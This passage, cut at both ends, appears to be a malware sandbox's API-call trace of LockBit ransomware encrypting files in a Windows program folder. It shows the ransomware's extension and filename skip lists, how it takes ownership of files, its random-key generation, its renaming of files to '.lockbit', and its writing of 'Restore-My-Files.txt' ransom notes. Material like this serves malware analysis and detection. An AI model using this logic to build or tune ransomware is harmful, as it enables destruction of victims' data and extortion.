(hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3015c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3015c) returned 0x0 [0091.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.846] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3016c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3016c) returned 0x0 [0091.846] ReadFile (in: hFile=0x119c, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0091.848] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0091.848] malloc (_Size=0xbe) returned 0x2071008 [0091.848] NtSetInformationFile (FileHandle=0x119c, IoStatusBlock=0x3d6aa8c, FileInformation=0x2071008, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0091.849] free (_Block=0x2071008) [0091.849] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 1 [0091.849] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt") returned 74 [0091.849] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.849] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6ce61c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6ce61c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5444a30d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x143e, dwReserved0=0x0, dwReserved1=0x0, cFileName="720_480shadow.png", cAlternateFileName="")) returned 1 [0091.849] lstrcmpiW (lpString1=".", lpString2="720_480shadow.png") returned -1 [0091.849] lstrcmpiW (lpString1="..", lpString2="720_480shadow.png") returned -1 [0091.849] PathFindExtensionW (pszPath="720_480shadow.png") returned=".png" [0091.849] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0091.850] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0091.850] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0091.850] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0091.851] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0091.851] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0091.851] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0091.851] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0091.851] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0091.851] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0091.851] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0091.851] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0091.851] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0091.851] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0091.851] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0091.851] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0091.851] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0091.851] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0091.851] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0091.851] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0091.851] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0091.851] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0091.851] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0091.852] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0091.852] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0091.852] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0091.852] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0091.852] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0091.852] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0091.852] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0091.852] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="720_480shadow.png") returned 1 [0091.852] lstrcmpiW (lpString1="ntldr", lpString2="720_480shadow.png") returned 1 [0091.852] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="720_480shadow.png") returned 1 [0091.852] lstrcmpiW (lpString1="bootsect.bak", lpString2="720_480shadow.png") returned 1 [0091.852] lstrcmpiW (lpString1="autorun.inf", lpString2="720_480shadow.png") returned 1 [0091.852] lstrcmpiW (lpString1="thumbs.db", lpString2="720_480shadow.png") returned 1 [0091.852] lstrcmpiW (lpString1="iconcache.db", lpString2="720_480shadow.png") returned 1 [0091.852] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\") returned="" [0091.852] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png") returned=".png" [0091.852] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0091.852] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0091.852] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0091.853] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0091.854] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0091.854] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0091.854] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0091.854] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0091.854] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0091.854] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0091.854] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0091.854] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.lockbit") returned 79 [0091.854] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720_480shadow.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.856] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0091.858] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0091.858] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.859] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0091.860] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0091.860] RtlFreeAnsiString (AnsiString="\\") [0091.860] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x11a0) returned 0x0 [0091.861] malloc (_Size=0x200) returned 0x2071008 [0091.861] NtQueryInformationToken (in: TokenHandle=0x11a0, TokenInformationClass=0x1, TokenInformation=0x2071008, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071008, ReturnLength=0x3d6acd8) returned 0x0 [0091.861] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.861] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071010*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.861] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.862] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.863] CloseHandle (hObject=0x11a0) returned 1 [0091.863] free (_Block=0x2071008) [0091.863] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720_480shadow.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x11a0 [0091.863] CreateIoCompletionPort (FileHandle=0x11a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.863] malloc (_Size=0x40068) returned 0x3e30198 [0091.866] GetFileSizeEx (in: hFile=0x11a0, lpFileSize=0x3e301b0 | out: lpFileSize=0x3e301b0*=5182) returned 1 [0091.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e701cc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e701cc) returned 0x0 [0091.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e701dc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e701dc) returned 0x0 [0091.871] ReadFile (in: hFile=0x11a0, lpBuffer=0x3e301cc, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30198 | out: lpBuffer=0x3e301cc*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30198) returned 1 [0092.049] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.049] malloc (_Size=0xb4) returned 0x77d800 [0092.049] NtSetInformationFile (FileHandle=0x11a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0092.049] free (_Block=0x77d800) [0092.049] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 1 [0092.049] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt") returned 74 [0092.049] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.049] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7ff104, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7ff104, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54613375, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0092.049] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0092.049] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0092.049] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0092.049] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.049] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.049] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.049] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.049] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.049] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.049] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.050] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.050] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.050] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.050] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.050] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.050] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.050] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.051] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.051] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.051] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.051] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.051] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.051] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.051] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.051] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.051] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.051] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.051] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.051] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.051] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.051] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.051] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0092.051] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0092.051] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0092.051] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0092.051] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0092.051] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0092.051] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0092.051] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\") returned="" [0092.051] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png") returned=".png" [0092.052] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.052] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.052] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.052] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.052] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.052] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.052] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.052] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.053] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.053] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.053] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.053] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.lockbit") returned 94 [0092.053] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.055] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.056] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.056] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.057] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.059] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.059] RtlFreeAnsiString (AnsiString="\\") [0092.059] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x11a0) returned 0x0 [0092.059] malloc (_Size=0x200) returned 0x77d800 [0092.059] NtQueryInformationToken (in: TokenHandle=0x11a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.059] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.059] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.059] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.060] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.060] CloseHandle (hObject=0x11a0) returned 1 [0092.060] free (_Block=0x77d800) [0092.060] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x11a0 [0092.061] CreateIoCompletionPort (FileHandle=0x11a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.061] malloc (_Size=0x40068) returned 0x1ff1e60 [0092.061] GetFileSizeEx (in: hFile=0x11a0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5088) returned 1 [0092.061] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.064] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0092.064] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.066] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0092.066] ReadFile (in: hFile=0x11a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.068] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.068] malloc (_Size=0xd2) returned 0x77d800 [0092.068] NtSetInformationFile (FileHandle=0x11a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd2, FileInformationClass=0xa) returned 0x0 [0092.069] free (_Block=0x77d800) [0092.069] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 1 [0092.069] wsprintfW (in: param_1=0x3d6a878, 